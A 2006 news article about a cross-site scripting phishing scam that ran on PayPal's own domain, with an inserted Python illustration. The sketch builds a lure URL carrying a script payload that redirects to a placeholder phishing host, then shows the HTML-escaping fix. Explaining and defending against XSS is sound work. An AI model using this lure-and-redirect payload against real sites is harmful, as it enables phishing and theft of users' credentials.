
PayPal fixes fatal flaw

Hackers placed fake URL on its site
Mon Jun 19 2006, 10:24
ONLINE TRANSACTION outfit PayPal has found a phony URL on its own site that fraudsters were using to steal credit card numbers and other personal information belonging to PayPal users.

The issue was publicised by Netcraft, and PayPal swiftly fixed it. However, it is unclear how many people lost personal details because of it.

The scam involved tricking users into visiting a URL hosted on the real PayPal web site. That page used SSL to encrypt information transmitted to and from the site, and presented a valid SSL certificate (with 256-bit encryption) confirming that the site does indeed belong to PayPal. But the content of the page had been modified by the fraudsters using a cross-site scripting (XSS) technique, which lets an attacker get text and script of their own choosing rendered by a site that fails to sanitise user-supplied input.

When the victim visited the page, they were presented with a message 'injected' into the genuine PayPal site that read, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." They were then redirected to an external server in Korea, which presented a fake PayPal Member Log-In page, and anything the punter tapped in went straight to the fraudsters.
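As an added illustration of the pattern described above (this is example code written for this page, not code from the article, from Netcraft or from PayPal), the Python sketch below shows a page that echoes a query parameter into its body unescaped, a lure link on the site's own domain carrying a payload in the style of the one quoted, and the escaped rendering that neutralises it. The page path, the `notice` parameter name, the template and the phishing hostname are all assumed placeholders; the payload text is constructed for the demonstration.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical page on the genuine domain that reflects a 'notice' query
# parameter into its HTML body. The path and parameter name are assumptions.
LURE_BASE = "https://www.paypal.com/example-page"
TEMPLATE = "<html><body><h1>Account</h1><p>{notice}</p></body></html>"

# Constructed payload in the style the article describes: a fake
# "account disabled" notice followed by a redirect to an external host.
# The hostname is a placeholder, not the server actually involved.
PAYLOAD = (
    "Your account is currently disabled because we think it has been "
    "accessed by a third party. You will now be redirected to Resolution Center."
    "<script>window.location='http://phish.example/paypal/login'</script>"
)


def lure_url(payload: str = PAYLOAD) -> str:
    """Build the link a victim would be sent: the real domain, with the
    attacker's payload URL-encoded into the reflected parameter."""
    return LURE_BASE + "?" + urlencode({"notice": payload})


def notice_from_url(url: str) -> str:
    """Server side: recover the 'notice' parameter from the request URL."""
    query = parse_qs(urlsplit(url).query)
    return query.get("notice", [""])[0]


def render_vulnerable(notice: str) -> str:
    """The flaw: the parameter is dropped into the page verbatim, so a
    <script> tag in it runs in the context of the genuine site."""
    return TEMPLATE.format(notice=notice)


def render_fixed(notice: str) -> str:
    """The fix: HTML-escape the parameter before rendering. The notice text
    is still shown, but '<' and '>' become entities and no script executes."""
    return TEMPLATE.format(notice=html.escape(notice, quote=True))


def contains_active_script(page: str) -> bool:
    """Crude check used here to compare the two renderings: does the page
    contain a literal, unescaped <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    url = lure_url()
    notice = notice_from_url(url)
    print("vulnerable page runs script:", contains_active_script(render_vulnerable(notice)))
    print("fixed page runs script:     ", contains_active_script(render_fixed(notice)))
```

The point of the comparison is that the address bar and certificate are identical in both cases; only the server's handling of the reflected parameter decides whether the attacker's redirect executes under the site's own origin.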

Punters could be forgiven for falling for the scheme: the page they saw was served from PayPal's own domain name with PayPal's own valid certificate, so the usual advice of checking the address bar and the padlock would not have saved them.

PayPal has had a few words with the Korean ISP and is getting the server shut down. However, it says it has already dealt with the problem on its own site.


